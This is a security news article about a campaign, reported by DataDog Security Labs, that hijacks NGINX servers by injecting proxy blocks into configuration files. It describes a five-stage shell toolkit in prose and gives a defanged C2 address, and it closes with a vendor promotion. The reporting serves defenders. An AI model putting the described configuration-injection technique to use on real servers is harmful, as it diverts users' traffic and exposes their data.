Malicious Traffic Diversion: Hackers Compromise NGINX Servers
A sophisticated cyber threat actor is orchestrating a campaign to compromise NGINX servers, hijacking user traffic and redirecting it through their own backend infrastructure. This attack is particularly insidious as it leverages the very features of NGINX, a powerful open-source software for web traffic management, to evade detection.
NGINX, a versatile tool, acts as an intermediary, facilitating connections between users and servers for web serving, load balancing, caching, and reverse proxying. The malicious campaign, uncovered by DataDog Security Labs, targets specific NGINX installations and Baota hosting management panels, focusing on websites with Asian top-level domains (.in, .id, .pe, .bd, .th) and government and educational sites (.edu, .gov).
The attackers employ a multi-stage toolkit to inject malicious 'location' blocks into existing NGINX configuration files. These blocks capture incoming requests on specific URL paths chosen by the attackers. The configuration is then modified to include the full original URL and forward traffic using the 'proxypass' directive to attacker-controlled domains. This technique is cleverly disguised as it utilizes the 'proxypass' directive, typically used for load balancing, which doesn't trigger security alerts.
To maintain the legitimacy of the traffic, request headers such as 'Host', 'X-Real-IP', 'User-Agent', and 'Referer' are preserved. The attack's multi-stage toolkit operates in the following manner:
- Stage 1: zx.sh - This initial script downloads and executes subsequent stages. It includes a fallback mechanism to send raw HTTP requests over TCP if curl or wget are unavailable.
- Stage 2: bt.sh - Targets Baota panel-managed NGINX config files, dynamically selecting injection templates based on server_name values, safely overwriting configurations, and reloading NGINX to prevent downtime.
- Stage 3: 4zdh.sh - Enumerates common NGINX config locations, using parsing tools to prevent corruption. It detects prior injections via hashing and a global mapping file, and validates changes before reloading.
- Stage 4: zdh.sh - Focuses on /etc/nginx/sites-enabled, targeting .in and .id domains. It follows the same config testing and reload process, with a forced restart as a fallback.
- Stage 5: ok.sh - Scans compromised configurations, mapping hijacked domains, injection templates, and proxy targets. Data is exfiltrated to a C2 server at 158.94.210[.]227.
The stealthiness of this attack lies in its ability to avoid exploiting NGINX vulnerabilities. Instead, it hides malicious instructions within configuration files, which are often overlooked. As user traffic still reaches its intended destination, the diversion through attacker infrastructure may go unnoticed without specific monitoring.
The rapid evolution of IT infrastructure presents challenges for manual workflows. To stay ahead, organizations must embrace automation and intelligent workflows, as explored in the Tines guide: 'The Future of IT Infrastructure'. This guide offers insights into reducing manual delays, enhancing reliability through automated responses, and scaling workflows seamlessly on top of existing tools.
